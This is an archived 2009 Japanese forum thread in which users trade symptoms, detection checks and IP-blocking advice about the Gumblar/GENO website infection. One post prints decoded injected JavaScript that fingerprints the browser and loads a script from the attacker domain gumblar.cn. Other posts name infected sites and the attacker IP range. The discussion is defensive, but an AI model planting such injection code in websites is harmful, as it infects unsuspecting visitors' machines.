PHSで東京から大阪まで電話代が幾ら掛かるか配慮もせんと
一回氏ね、みたいなw
503名無しさん@お腹いっぱい。:2009/05/14(木) 18:00:45
>>501
dクス。
ビスタまで殺られたと思ってUNKOもらすとこだった!
504名無しさん@お腹いっぱい。:2009/05/14(木) 18:06:24
374=384です

avastで、全ドライブをチェックかけましたが、ウイルスは検出されませんでした
これは、最初のアラート音が鳴った時に、ページを開く前にウイルスのコードをavastが発見して
実行するのを未然防止したと考えて良いんでしょうか?
それとも、もはやavastでも検出できないような姿に変化して、ブート領域にウイルスが住み着いているんでしょうか?

何か、ウイルスに感染しているかどうか確かめる方法(どっかのディレクトリの特定ファイルが削除されているとか、
改変されているとか、新しく特定名称のフォルダ、ファイルが作られているとか・・・)ってありませんか?

とりあえず、avastで全ドライブをチェックかけて、何も出て来なければ、感染を未然に防止できたと考えてOKでしょうか?
505名無しさん@お腹いっぱい。:2009/05/14(木) 18:07:06
たった今、うっかりGENOのホームページに行ってしまったんだがまだヤバいの?
詳しいこと知らないので、心臓バクバクいってます。
506名無しさん@お腹いっぱい。:2009/05/14(木) 18:11:00
>>471だけどカスペ先生の更新時期がもう直ぐavastは
無料なのにGENOウイルス検知するほど性能がいいのか・・
更新しないでavast使ってみようかなぁ
スレチでスマン
507名無しさん@お腹いっぱい。:2009/05/14(木) 18:18:45
今回はたまたまavastが頑張ったという気もするけど
うちはavast+定期的に他社オンラインスキャンで今までウィルスに引っかかった事は無いかな
508名無しさん@お腹いっぱい。:2009/05/14(木) 18:22:17
>>493
ttp://up2.viploader.net/pic2/src/viploaderf157648.png

一時間かかった・・・・・
PCtoolは設定が面倒だなぁ
509名無しさん@お腹いっぱい。:2009/05/14(木) 18:32:08
うちのルーターはIP焼き設定数上限に達しやがったぜ・・・
510名無しさん@お腹いっぱい。:2009/05/14(木) 18:32:37
>>481
なぜか実際のサイズが
2,150,400 バイト
511名無しさん@お腹いっぱい。:2009/05/14(木) 18:40:05
>>374>>497
今そこはサイトメンテナンスしているようだ
ユーザー名とパスワードを要求してくるな
512名無しさん@お腹いっぱい。:2009/05/14(木) 18:49:18
IPブロックって、
peergurdianなんかでやるんですか?
513名無しさん@お腹いっぱい。:2009/05/14(木) 18:51:52
GENOウイルスってトロイの木馬らしいですが、具体的にどういう悪さをするんですか?
514名無しさん@お腹いっぱい。:2009/05/14(木) 18:55:19
スレ嫁
515名無しさん@お腹いっぱい。:2009/05/14(木) 19:05:04
スレをざっと見渡した感じでは、良く挙動が分かっていないってことですかね?
516名無しさん@お腹いっぱい。:2009/05/14(木) 19:33:04
>>515
そう書けば、誰かが教えてくれると思った?
面倒な人だね
517名無しさん@お腹いっぱい。:2009/05/14(木) 19:35:05

書き込み>>425だが、チェックしてきたお

【OS】Vista
【セキュリティソフト】マカフィ
【ウィルスを疑った理由】saymoveの利用・IEのフリーズ

【確認手段】
1:PCの再起動が正常か否か
2:sqlsodbc.chm の改変の有無
3:ニフティでのオンラインチェック

【結果】
1:正常に起動○
2:改変は無し○
3:管理者モードでIE起動方法わからず・・・orz△

3がチェックできれば完璧なんだが・・・
518名無しさん@お腹いっぱい。:2009/05/14(木) 19:41:44
WHOのパンデミック警報はフェーズ5だけど、
このウイルスはフェーズ幾つぐらいよ?
519名無しさん@お腹いっぱい。:2009/05/14(木) 19:43:54
>>516
いや、思いませんでしたよ
2chは不親切な人が多いですから
520名無しさん@お腹いっぱい。:2009/05/14(木) 19:58:58
>>518
もうフェーズ6レベルじゃね?
収まる気配ゼロだし
521名無しさん@お腹いっぱい。:2009/05/14(木) 20:05:00
>>517
カスペはやらなかったのか
522521:2009/05/14(木) 20:05:52
あ、すまん、ニフやってきたのね
523名無しさん@お腹いっぱい。:2009/05/14(木) 20:24:37
・sqlsodbc.chmを改変
・cmd.exe、regedit.exeが起動不能
・一部のアンチウイルスソフトが更新不能
・特定サイトにアクセス不能(Windows Update、アンチウイルスソフト関連サイト)
・ネットワークのトラフィックを監視、ユーザー名やパスワード等の情報を収集
・Googleの検索結果を改竄(リンクを弄る)
・explorer.exeや一部のブラウザが異常終了
・Acrobatが勝手に起動
・PDFファイルやシステムファイルが増殖
・CPU、メモリ使用率がUP
・再起動時にBSOD
524名無しさん@お腹いっぱい。:2009/05/14(木) 20:26:32
>>522
一応事故解決してニフでチェックでできたお

【OS】Vista
【セキュリティソフト】マカフィ
【ウィルスを疑った理由】saymoveの利用・IEのフリーズ

【確認手段】
1:PCの再起動が正常か否か
2:sqlsodbc.chm の改変の有無
3:ニフティでのオンラインチェック

【結果】
1:正常に起動○
2:改変は無し○
3:ウィルスはなし○


ということで一応大丈夫みたい
ただちにウィルス更新とバックパックしてきま
525名無しさん@お腹いっぱい。:2009/05/14(木) 20:26:57
>>484
unescape〜replaceの右上にgumblarが出てるな。
526名無しさん@お腹いっぱい。:2009/05/14(木) 20:29:20
>>523
Googleの検索結果を改竄って初めて見るが、何処の情報?
527名無しさん@お腹いっぱい。:2009/05/14(木) 20:30:35
>>526
ほい。

UnderForge of Lack ≫ Blog Archive ≫ ScanSafe reported the zlkon virus progress
http://www3.atword.jp/gnome/2009/04/19/scansafe-reported-the-zlkon-virus-progress/
528名無しさん@お腹いっぱい。:2009/05/14(木) 20:31:39
>>523
何でもありだなw
529名無しさん@お腹いっぱい。:2009/05/14(木) 20:32:15
XP厨はいつ何時やられるかわからず冷や冷やもんだな
530名無しさん@お腹いっぱい。:2009/05/14(木) 20:40:01
>>523
なぶり殺しと言うか、何と言うか…。
いっそ、HDDを綺麗さっぱりフォーマットしてくれた方が…。
531名無しさん@お腹いっぱい。:2009/05/14(木) 20:40:56
google検索改竄して自サイトへアクセスさせようとするのかな
532名無しさん@お腹いっぱい。:2009/05/14(木) 20:46:59
終息してるし次スレは要らないね。
533名無しさん@お腹いっぱい。:2009/05/14(木) 20:48:06
>>531
アフィリエイト狙いらしい。
そこから足が付きそうだけど、匿名口座とかも使ってるんだろう。
534名無しさん@お腹いっぱい。:2009/05/14(木) 20:48:17
>>532
GENO社員乙
535名無しさん@お腹いっぱい。:2009/05/14(木) 20:49:43
>>527
thx
536名無しさん@お腹いっぱい。:2009/05/14(木) 20:54:36
このウイルス、VISTAはスルーなんだって?
俺、XPなんだけど
cmd.exe、regedit.exeが起動したってことは
感染してないってことおkなんだよね?
537名無しさん@お腹いっぱい。:2009/05/14(木) 20:54:51
>>533
なるほど、意外とこすいなぁw
538名無しさん@お腹いっぱい。:2009/05/14(木) 20:55:03
>>532
逆に拡散してると思うがw
539名無しさん@お腹いっぱい。:2009/05/14(木) 20:56:16
>>536
念のために

【確認手段】
1:PCの再起動が正常か否か
2:sqlsodbc.chm の改変の有無
3:ニフティでのオンラインチェック

ぐらいはしておいたほうが・・・
540名無しさん@お腹いっぱい。:2009/05/14(木) 20:57:58
>>523
・ゾンビ化も追加
ソースは>>324

>>530
生かさず殺さずだね
541名無しさん@お腹いっぱい。:2009/05/14(木) 20:58:16
VISTA感染報告きてるね
542名無しさん@お腹いっぱい。:2009/05/14(木) 20:59:01
まだ未確定の段階か
543名無しさん@お腹いっぱい。:2009/05/14(木) 21:00:22
>>541
まじすか?
544名無しさん@お腹いっぱい。:2009/05/14(木) 21:01:02
>>508
素直にPG2で設定しろよ。
545名無しさん@お腹いっぱい。:2009/05/14(木) 21:02:17
>>532
なんか久しぶりだな。GENO社員乙w
546名無しさん@お腹いっぱい。:2009/05/14(木) 21:06:01
・Googleの検索結果を改竄(リンクを弄る)

↑これどうやって確認すればいいの?
547名無しさん@お腹いっぱい。:2009/05/14(木) 21:08:38
>>543
まだ詳しいことかいてないからわからないけど、一応貼っとくね

***
あの有名動画サイトSayMove!がGenoウイルスに感染、アクセスした乞食どもやばいぞ
http://tsushima.2ch.net/test/read.cgi/news/1242145955/864

864 名前: キクザキイチゲ(中国地方)[sage] 投稿日:2009/05/14(木) 20:24:48.23 ID:0ZvJo5LH
該当時間のsaymoveにアクセスした後、パソコンの挙動がえらい不安定に
なったんだけど、やっぱりこれって喰らってしまったんでしょうか?。

ビスタHomePremium64bit+avast!なんですけど、
頻繁にフリーズするようになった(PCを購入して約2年一度も無かったのに、
一昨日から今日までに7回もフリーズ。)

あと、ついさっき、
スリープにしてても勝手に復帰している
スリープから復帰して暫くすると、HDDを認識しないようになる
といった症状がでた。

一応、カスペルスキーのオンラインスキャンの重要な部分だけを試して
みたけど、検出はされませんでした。トレンドマイクロの方も同様。

報告されている症状と全く違うんですが、どうなんでしょ?。
548名無しさん@お腹いっぱい。:2009/05/14(木) 21:11:54
>>546
アフィのスクリプトをひとつずつページソースで確認するしかないでしょ。
549名無しさん@お腹いっぱい。:2009/05/14(木) 21:19:11
>>548
面倒だなw

firefoxなんだけどWOT(Web of Trust)とか入れてもだめなのかな?

ちなみにWOTって「分かりやすく色分けされたWOTアイコンによって
サイトへのリンクをクリックする前に、オンライン詐欺、なりすまし
不審なショッピングサイト、セキュリティの脅威などを回避できます」
というアドオンですが、自分は入れてません
550名無しさん@お腹いっぱい。:2009/05/14(木) 21:27:16
avastさんが感知してくれたのに誤作動だと思って突っ込んで感染した俺だけど
やっぱりIEがよく反応無しになる、おまけにパソゲーも反応無しになる
今カスペルスキーってとこでオンラインスキャンしてるが
このウイルスはどこに感染するんだ?32のチェックはもう終わったみたいだが
何も検出されなかったぞ?
全領域でやったら一件検出されたが何か勝手に止まったわ
551名無しさん@お腹いっぱい。:2009/05/14(木) 21:29:10
ググれば一番上にくるからすぐ分かると思うけど「ライブハウス あさがやドラム」の
サイトも怪しいらしいのですが、誰かvistaの人確認してくれないかなw
552名無しさん@お腹いっぱい。:2009/05/14(木) 21:29:54
>>550
感染が確実なら時間勿体無いから即リカバリしたほうがいいよ。
疑心暗鬼で使い続けるのは精神的に辛いでしょ
553名無しさん@お腹いっぱい。:2009/05/14(木) 21:32:09
>>550
新種が毎日出ててカスペも新種は当然スルー
554名無しさん@お腹いっぱい。:2009/05/14(木) 21:32:22
>>552
代えのHDDがねえんだよっ!仕事ねえからさ・・・
555名無しさん@お腹いっぱい。:2009/05/14(木) 21:35:39
Aviraは感知してくれる?

誤作動はないし、>>539でチェックしても問題ないから、
いまんところ被害はないと思うけど、
怖いものみたさで問題サイト踏んでみたいという妙な欲望も・・・
556名無しさん@お腹いっぱい。:2009/05/14(木) 21:36:23
>>551
感染してる
557名無しさん@お腹いっぱい。:2009/05/14(木) 21:39:05
>>556
おおっ!!

ありがとう勇者様、一昨日は大丈夫だったらしいんだが・・・
なんか被害拡散してるなw
558名無しさん@お腹いっぱい。:2009/05/14(木) 21:40:42
何れにしても中古の使い捨てPCでよかったよ。
559名無しさん@お腹いっぱい。:2009/05/14(木) 21:40:51
これってプログラムが書き換えられるだけみたいだし
システムの復元とか使えないんだろか?
560名無しさん@お腹いっぱい。:2009/05/14(木) 21:44:36
>>559
フルバックアップでもなければ無理だろ。
561名無しさん@お腹いっぱい。:2009/05/14(木) 21:46:09
>>559
>システムの復元

それのほうが怖いよw
562名無しさん@お腹いっぱい。:2009/05/14(木) 21:46:35
スレの伸び方が恐ろしい。
急に拡散した?
563名無しさん@お腹いっぱい。:2009/05/14(木) 21:47:32
>>559
そんな無意味な事するくらいならインストールしなおすわ。
564名無しさん@お腹いっぱい。:2009/05/14(木) 21:50:40
>>562
前から拡散、大手・個人の各サイトが隠蔽・感染に気づかず
新型インフルを超えた・・・。しかし、山田みたいに話題にも
あがらない・・・
565名無しさん@お腹いっぱい。:2009/05/14(木) 21:51:03
>>544
こんなのあるのか
thx
566名無しさん@お腹いっぱい。:2009/05/14(木) 21:51:43
>>549
中の人やユーザの評価で安全か有害か決めるんならあまり頼れないんじゃない?
567名無しさん@お腹いっぱい。:2009/05/14(木) 21:56:18
PeerGuardian 2 for Windows β6b 日本語第2版
ttp://www.dukedog.flnet.org/cgi-bin/Statistics/dl.php?dl=pg2-050918-nt-jp
繋がらなくて落とせねぇ
568名無しさん@お腹いっぱい。:2009/05/14(木) 21:57:36
>>566
だよね・・・
569名無しさん@お腹いっぱい。:2009/05/14(木) 21:58:08
>>562
小林製薬(>>351)とネラーに利用者が多そうなSayMove!(>>282)の感染が発覚。
570名無しさん@お腹いっぱい。:2009/05/14(木) 22:02:05
小林製薬が感染したことで、PCライトユーザーにも十分認知されればいいんだけど。。
571名無しさん@お腹いっぱい。:2009/05/14(木) 22:02:28
これはググルさんが公式に対策に乗り出したってこと?
Google Safe Browsing diagnostic page for gumblar.cn
http://google.com/safebrowsing/diagnostic?site=gumblar.cn/&hl=en
Gumblar hitting Googlers hard
http://www.daniweb.com/blogs/entry4339.html#
Large amount of cross-site scripting attacks see websites compromised - SC Magazine UK
http://www.scmagazineuk.com/Large-amount-of-cross-site-scripting-attacks-see-websites-compromised/article/136763/
572名無しさん@お腹いっぱい。:2009/05/14(木) 22:02:29
潜在感染者が多そうだな。
573名無しさん@お腹いっぱい。:2009/05/14(木) 22:03:35
>>568
てゆうかWeb of Trustでググッたこのサイトは大丈夫かな?
http://d.hatena.ne.jp/starocker/20071206/p1
なんかもうどのサイトも不安になってきたよ
できたらチェックお願いVISTAの方
574名無しさん@お腹いっぱい。:2009/05/14(木) 22:11:47
>>573
俺XPなんで、対策してても怖くて踏めませんw

ところで>>129が繋がんないんだけど、俺だけ?
575名無しさん@お腹いっぱい。:2009/05/14(木) 22:11:55
ウイルスセキュリティZEROのサイトのサービスが止まってるってよ。
576名無しさん@お腹いっぱい。:2009/05/14(木) 22:15:00
VMware導入した。ウイルスの挙動を確かめたいんで、感染済みのサイト教えてくれ。
あとAcrobat Reader9.1でも感染するっけ?
577名無しさん@お腹いっぱい。:2009/05/14(木) 22:19:20
578名無しさん@お腹いっぱい。:2009/05/14(木) 22:20:23
感染してすぐ症状出るものですか?
579名無しさん@お腹いっぱい。:2009/05/14(木) 22:20:33
フラッシュとアドビ9.1入れてasagaya-drum.com 踏んだけど
特になにもおきない


580名無しさん@お腹いっぱい。:2009/05/14(木) 22:21:25
(\.n     安全安心とっても快適な工夫もいっぱい windowsVISTA みんな買おうよ!
  ヽ .ソ
  | |          ∧_∧  
  | |  ∧_∧  _( ´∀`)     ∧_∧    ∧_∧  ∧_∧    ∧_∧     ∧_∧
  \ \( ´∀` ) ̄      ⌒ヽ ( ´∀` )  ( ´∀` ) _ (´∀` )⌒`(´∀` )--―(´∀` )    n
    \     ⌒ ̄ヽ      ./~⌒    ⌒/⌒   ⌒ヽ      /~⌒     ⌒\      \   ( E)
  ∩. `、      ./ ̄|    //`i     /        /|     //`i       / |     ヽ ヽ/ /
 . (7ヌ)|     | (ミ    ミ) | ∧__∧  |     /(ミ   ミ)  |∧_∧| |     | \__/
  / /  ∧_∧     ∧_∧  _( ´∀`)    ∧_∧   ∧_∧_(´∀` )   ∧_∧   ||
  \ \( ´∀`)―--( ´∀` ) ̄      ⌒ヽ ( ´∀` )  ( ´∀` ) _     ⌒ヽ(´∀` ) //
 (\.n\       /⌒   ⌒ ̄ヽ     /~⌒    ⌒/⌒   ⌒ヽ      /~⌒    ⌒ /
  ヽ .ソ |      |ー、     / ̄|      //`i       / 、     /|     //` i     /
  | | |      |  |∧_∧ /  (ミ    ミ)  |    | |    /(ミ   ミ) .|    |
  | |  ∧_∧  _( ´∀`)   ∧_∧ | ∧_∧___∧_∧  .|∧_∧  \ ∧_∧.|
  \ \( ´∀` ) ̄      ⌒ヽ( ´∀` ) | ( ´∀` ) _ (´∀` )⌒`(´∀` )--―(´∀` ) | . . n
    \     ⌒ ̄ヽ     . /~⌒    ⌒/⌒   ⌒ヽ      /~⌒     ⌒\      \   ( E)
  ∩. `、     ./ ̄|    //`i      / 、      /|     //`i       / |      ヽ ヽ/ /
 . (7ヌ)|     | (ミ   ミ)  | ∧ ∧ |    /(ミ    ミ) |∧ ∧ | |     | \__/
581名無しさん@お腹いっぱい。:2009/05/14(木) 22:22:32
ポットウィルスなら駆除出来るけどこれは難しいのかなぁ
582名無しさん@お腹いっぱい。:2009/05/14(木) 22:24:33
>>580
お前ら全員VistaにくるとVistaが狙われるようになるから来ないでくれるか?
583名無しさん@お腹いっぱい。:2009/05/14(木) 22:25:51
>>567
オレも導入しようとしたが、日本語版とれないな・・・
584名無しさん@お腹いっぱい。:2009/05/14(木) 22:26:21
>>579
>>102は?
585名無しさん@お腹いっぱい。:2009/05/14(木) 22:28:19
aguseでは白だな。>あさがやドラム
586名無しさん@お腹いっぱい。:2009/05/14(木) 22:28:25
質問です。

私、セキュリティソフトはソースネクストの ウィルスセキュリティZERO を使ってるのですが、

このセキュリティソフトはGENOウィルスに対応しているんでしょうか?
587名無しさん@お腹いっぱい。:2009/05/14(木) 22:30:01
588名無しさん@お腹いっぱい。:2009/05/14(木) 22:31:58
>>584
アドビ8.13にして全部踏んだけどなんともないわ
589名無しさん@お腹いっぱい。:2009/05/14(木) 22:32:14
>>579
>>432のGoogle セーフ ブラウジングの結果で挙げられている幾つかのサイトはどうか。
590名無しさん@お腹いっぱい。:2009/05/14(木) 22:33:16
>>579
そのサイトも侵されている
591名無しさん@お腹いっぱい。:2009/05/14(木) 22:33:51
Adobe Reader・Acrobat に不正終了やコード実行の脆弱性―JPCERT/CC が注意喚起 - japan.internet.com Webテクノロジー
http://japan.internet.com/webtech/20090514/5.html

本物そっくりの「Flash Player」偽サイト出現、目的はウイルス配布:ITpro
http://itpro.nikkeibp.co.jp/article/NEWS/20090514/330029/
こっちは関係あると思ったらなかった
592名無しさん@お腹いっぱい。:2009/05/14(木) 22:36:15
もうなにがなんだかwwwww
593名無しさん@お腹いっぱい。:2009/05/14(木) 22:45:36
どこ踏んでも、sqlsodbc.chmの改変確認できねえぞ
594名無しさん@お腹いっぱい。:2009/05/14(木) 22:50:36
ポッドウィルス駆除じゃこれは取りきれないか?
595名無しさん@お腹いっぱい。:2009/05/14(木) 22:52:56
ポッドウィルスw
596名無しさん@お腹いっぱい。:2009/05/14(木) 22:57:41
>>594
つ クリーンインストール
597名無しさん@お腹いっぱい。:2009/05/14(木) 23:04:34
>>593
↓このスレから種を拾って直接実行すれば…。

【鑑定目的禁止】検出可否報告スレ10
http://pc11.2ch.net/test/read.cgi/sec/1235459712/
598名無しさん@お腹いっぱい。:2009/05/14(木) 23:04:50
>>595
ごめん。ポットだったw
599名無しさん@お腹いっぱい。:2009/05/14(木) 23:11:33
またかw

BIG-server.com binboserver.com メンテナンス / 障害報告
http://www.maido3.cc/server/release/2009/200905082023.html
600PG2:2009/05/14(木) 23:19:50
PG2導入したんですが、上記セキュリティブログの58.65.232.0 - 58.65.239.255とかの数字を
PG2のリスト追加にコピペすればいいのかな?
601名無しさん@お腹いっぱい。:2009/05/14(木) 23:22:43
今北産業 現状のウイルス対策ソフトじゃ対応できないってマジ?
602名無しさん@お腹いっぱい。:2009/05/14(木) 23:24:21
亜種がワラワラ出てきてるwww
対応おっつかねwww
603名無しさん@お腹いっぱい。:2009/05/14(木) 23:25:56
Adobe Reader 9.1.1のアップデート、Adobeの日本語サイトにぜんぜん載ってないじゃん
わかりやすく載せとけよ
604名無しさん@お腹いっぱい。:2009/05/14(木) 23:27:21
maidoの感染は、マァブが原因らしい
605名無しさん@お腹いっぱい。:2009/05/14(木) 23:28:45
具体的に被害が出てるのはOS関連ファイル?
普通のファイルにも感染する?
606名無しさん@お腹いっぱい。:2009/05/14(木) 23:29:00
ソフト会社の人にはモカやユンケル飲んで死なない程度にがんばってほしい。
607名無しさん@お腹いっぱい。:2009/05/14(木) 23:30:37
   対策
    * WindowsUpdate
    * PDFリーダーを最新にする (AdobeReader や Foxit Reader)
    * AdobeFlashを最新にする
    * 94.247.2.195(94.247.[2-3].[0-255])への接続を遮断
    * Javascriptを切る
    * 貼られている怪しいリンクをむやみに開かない
    * ウイルス定義ファイルを更新する

↑これの
* 94.247.2.195(94.247.[2-3].[0-255])への接続を遮断
はfirefoxのアドオンで対応できますか?
608名無しさん@お腹いっぱい。:2009/05/14(木) 23:33:05
>>567 >>583 こちらへ

PeerGuardian 33
tp://hideyoshi.2ch.net/test/read.cgi/download/1237676474/
609名無しさん@お腹いっぱい。:2009/05/14(木) 23:34:41
>>607
アンチウイルスのFWに設定したほういいと思う
610名無しさん@お腹いっぱい。:2009/05/14(木) 23:36:08
Javascript切ると見れなくなるサイトいっぱいあるじゃん
不便すぎる
611名無しさん@お腹いっぱい。:2009/05/14(木) 23:38:23
adobe関係をアンインストールしときゃなんとかなる?
WindowsUpdateは今回のGENOウィルスには関係無いだろうけど、セキュリティー
強化の為にはまあ必要なことだ。
612名無しさん@お腹いっぱい。:2009/05/14(木) 23:38:59
>>608
ありがとう。スレあったのね。いってきマース
613名無しさん@お腹いっぱい。:2009/05/14(木) 23:41:45
>>609
ウイルスバスターだけど、設定画面みても分からんなw
ひょっとしてできないのかしら・・・
614名無しさん@お腹いっぱい。:2009/05/14(木) 23:54:57
>>613
暇だから調べてみた
ttp://virus.bind-web.net/virusburster2009/wall/wall-reigai.html
この辺参考にならん?
615名無しさん@お腹いっぱい。:2009/05/14(木) 23:55:30
>>613
例外ルール(プロトコル)でぐぐれ
616名無しさん@お腹いっぱい。:2009/05/15(金) 00:03:13
>あさがやドラム
解読してみた。

(function(xHRY){var Yh7='var a="ScriptEngine",b="Version() ",j="",u=navigator.userAgent;
if((u.indexOf("Win")>0)&&(u.indexOf("NT 6")<0)&&(document.cookie.indexOf("miek=1")<0)&&(typeof(zrvzts)!=typeof("A"))){zrvzts="A";
eval("if(window." a ")j=j "+a "Major" b a "Minor" b+a "Build" b "j;");
document.write("<script src=//gumblar.cn/rss/?id="+j "><\/script>");}';var x6Z=Yh7.replace(xHRY,'%');eval(unescape(x6Z))})(/_/g);

真っ黒でつ。
617名無しさん@お腹いっぱい。:2009/05/15(金) 00:06:57
ドクオが混じってるかと思ったら別もんか
("A")
618名無しさん@お腹いっぱい。:2009/05/15(金) 00:09:02
/gumblar.cn・・・
619名無しさん@お腹いっぱい。:2009/05/15(金) 00:12:07
でもこれで感染したサイトへの電凸が容易になったんじゃない?
「小林製薬のサイトを見てください、それと同じウイルスに感染していますよ」って説明できるし
(誰もが知っている)大手のサイトだから信用もしてもらいやすくなったはず
620名無しさん@お腹いっぱい。:2009/05/15(金) 00:25:36
>>617
こっちは泣いてるおにゃのこっぽいな> (/_/g);
621名無しさん@お腹いっぱい。:2009/05/15(金) 00:30:32

メガネメガネ ("A" )))....
622名無しさん@お腹いっぱい。:2009/05/15(金) 00:33:44
b "j;")
623名無しさん@お腹いっぱい。:2009/05/15(金) 00:35:38
大山鳴動して鼠一匹
624名無しさん@お腹いっぱい。:2009/05/15(金) 00:40:38
ポケモンのファンサイトにも感染してたけどこれはどういう事なんだ?


で、メール送っても対応無し。ブログ見ると「よくわからないので土曜日に兄に対応してもらいます」

625名無しさん@お腹いっぱい。:2009/05/15(金) 00:43:30
どういうこともなにも感染してたんだろう
お兄ちゃんがわかってくれるか心配だね
626名無しさん@お腹いっぱい。:2009/05/15(金) 00:45:01
弟なのか妹なのか
627名無しさん@お腹いっぱい。:2009/05/15(金) 00:45:48
しかし…
この脅威に世間は知らん振りか。
628名無しさん@お腹いっぱい。:2009/05/15(金) 00:50:17
>>624
629名無しさん@お腹いっぱい。:2009/05/15(金) 00:51:41
abuse.jpにアドレスぶち込めば、観戦か否かを判定できるんですか?
630名無しさん@お腹いっぱい。:2009/05/15(金) 00:54:24
>>629
最新亜種はまず無理。
aguse.jpがどんなUAで繋ぎに行ってるのかによってはまったく検出されない。
631名無しさん@お腹いっぱい。:2009/05/15(金) 00:56:05
>>601
事前にガードは出来るけど。
GDATAはページを開く前に真っ赤な画面になってアクセス拒否してくれた
632名無しさん@お腹いっぱい。:2009/05/15(金) 01:04:26
aguse.jpってカスペなの?
633名無しさん@お腹いっぱい。:2009/05/15(金) 01:06:27
>>631
それは、Avastが対応しているので、Avastのエンジンが検知してブロックしただけ。
他のベンダーだとすりぬけて、gumblar.cn の呼び出しまで進んじゃうよ。
634名無しさん@お腹いっぱい。:2009/05/15(金) 01:11:38
aviraはどうなの?ちゃんと対応してる?
635名無しさん@お腹いっぱい。:2009/05/15(金) 01:14:07
sqlsodbc.chmのサイズが50727バイトならとりあえず感染はしてないってことなの?
636名無しさん@お腹いっぱい。:2009/05/15(金) 01:14:20
>>634
http://pc11.2ch.net/test/read.cgi/sec/1235459712/862
自分で解凍してスキャンかけて確かめろ
637名無しさん@お腹いっぱい。:2009/05/15(金) 01:15:15
ここでも調べられます。   tp://www.gred.jp/
638名無しさん@お腹いっぱい。:2009/05/15(金) 01:17:15
>>634
gumblar.cnの新種にはまだ対応していない。
って言うか、いたちごっこだよ。
639名無しさん@お腹いっぱい。:2009/05/15(金) 01:19:31
国を指定して全てブロック出来れば良いのにね。出来るのかな?日本と米国以外行かないし。
640名無しさん@お腹いっぱい。:2009/05/15(金) 01:28:43
うっかりgumblar.cn開いちゃったけど、FirefoxのSafe Browsing APIでブロックされた…
IEだったら死んでたな
641名無しさん@お腹いっぱい。:2009/05/15(金) 01:29:15
GENOウイルスってHDも破損するんだろうか?
なんかクリーンインストールかけたんだけれどネットやってるとたまに切断されるようになっちゃったんだよな…
642名無しさん@お腹いっぱい。:2009/05/15(金) 01:33:34
ウイルスバスター2007のURLフィルタとフィッシングチェッカーを有効にした状態で
IE6にて、あさがやドラム のURLを開くと 「危険なサイト アドレス http://gumblar.cn/rss/?id=568835」とメッセージが出た
643名無しさん@お腹いっぱい。:2009/05/15(金) 01:36:45
UnderForge of Lack ≫ Zlkon, Gumblar 問題に関して
http://www3.atword.jp/gnome/zlkon-gumblar-%E5%95%8F%E9%A1%8C%E3%81%AB%E9%96%A2%E3%81%97%E3%81%A6/
%81%AB%E9%96%A2%E3%81%97%E3%81%A6/
644名無しさん@お腹いっぱい。:2009/05/15(金) 01:39:56
gumblarに感染してたサイトのお詫び文が、
ノートンやバスターは検出しなかったしavastの誤検出っぽいけど、
avastユーザからの指摘がウザイので一応アップし直します
のように書いてあってなんだか悔しくなった

感染してもはっきり分からないから世間の感覚はこんなもんか
645名無しさん@お腹いっぱい。:2009/05/15(金) 01:40:18
初心なことかもしれないけど
* 94.247.2.195(94.247.[2-3].[0-255])への接続を遮断
を制限するさいtcpとudpどっちなの?
646名無しさん@お腹いっぱい。:2009/05/15(金) 01:42:21
アップし直すだけじゃ無駄なのにな
647名無しさん@お腹いっぱい。:2009/05/15(金) 01:44:33
>>643
これ、次スレのテンプレに入れた方が良いんじゃね?
648642:2009/05/15(金) 01:45:41
>>644
ウイルスバスターでもブロックはできているみたいだ
649644:2009/05/15(金) 01:48:40
>>648
おそらく管理人がスキャンしたのはバスターが対応する以前と思われ
サイトが何日も感染した状態で放置されてたから
650名無しさん@お腹いっぱい。:2009/05/15(金) 01:48:58
>>645
TCPでしょう
いま、gumblar.cnでは94.229.65.172ですね
651642:2009/05/15(金) 01:53:32
>>649
ウイルスバスター2007の標準設定では反応なかったけれど
フィッシングチェッカーを有効にしたらメッセージがでるようになったよ
652名無しさん@お腹いっぱい。:2009/05/15(金) 01:56:32
久しぶりに踏んでみたがリファラをチェックするようになったんだな
リファラ切ってるとpdfもswfも読み込まれない
653名無しさん@お腹いっぱい。:2009/05/15(金) 01:56:41
>>650
おk
ありがとう
654名無しさん@お腹いっぱい。:2009/05/15(金) 01:57:19
>>645
どちらかを制限しない理由があるのか?
655名無しさん@お腹いっぱい。:2009/05/15(金) 02:01:07
すっげーやばそうなウイルスなのに
あまり騒がれていないのは気のせいなの?
656名無しさん@お腹いっぱい。:2009/05/15(金) 02:01:22
>>644
パスワードを変えなきゃ再度改竄されるよ、と言ってあげないと…。
657名無しさん@お腹いっぱい。:2009/05/15(金) 02:02:26
>>641
運が悪いと壊れるかもしれないけど切断とHDD関係なくね?
658名無しさん@お腹いっぱい。:2009/05/15(金) 02:02:41
パスワード変えても無駄
659名無しさん@お腹いっぱい。:2009/05/15(金) 02:05:20
管理者のPCのOSをクリーンインスコして、パスワードを変える。
660名無しさん@お腹いっぱい。:2009/05/15(金) 02:06:19
バスターはフィルタリング機能があるから
URLブラックリストに登録されれば遮断してくれるということか
661名無しさん@お腹いっぱい。:2009/05/15(金) 02:06:28
662名無しさん@お腹いっぱい。:2009/05/15(金) 02:08:20
>>655
気のせいじゃないよ。もっと話題になっても良いと思う。
亜種がどんどん出るらしいし、それら全てに対応できるセキュリティソフトはおそらくない。
クリーンイストールしか解決策が無い。
やばいですね・・・
663名無しさん@お腹いっぱい。:2009/05/15(金) 02:08:31
http://blogs.yahoo.co.jp/noooo_spam
http://excomp.cocolog-nifty.com/blog/kaspersky/index.html


告知情報はこんなもんか?


豚インフルの比じゃねえ はんぱねえ感染力!
664名無しさん@お腹いっぱい。:2009/05/15(金) 02:11:16
GENOは結局どこからこのウイルス持ってきたんだろ。
665名無しさん@お腹いっぱい。:2009/05/15(金) 02:11:38
現在拡散している Gumblar.cn
zlkonの亜種ですが以下のような特徴を持っています。

インジェクションコードが難解になった
バージョンチェックをユーザ側で行うため、サーバスクリプトの検出を回避している
 ※一部のIDSはサーバスクリプトへのクエリを監視しており、クライアント側でやられても判断できない
感染が容易と思われるPC環境をよりピンポイントに判断している(このため、セキュ各社の自動検出が難しくなっている)
感染しない環境には何も返さない(更に検証が難しい)
亜種の「更新」の頻度が異常にすばやく、亜種がほとんどのセキュソフトを潜り抜けているので、シグネーチャ・ベースでの検出が難しい
 ※検出率が上がる頃には次の種類になっている

感染の疑いがある場合
XP / 2000 の方は sqlsodbc.chm をチェックしてください。
※sqlsodbc.chmを使わない亜種の存在が確認されていますので、この方法に完全に頼るのは危険かもしれません。
ttp://www3.atword.jp/gnome/zlkon-gumblar-%E5%95%8F%E9%A1%8C%E3%81%AB%E9%96%A2%E3%81%97%E3%81%A6/
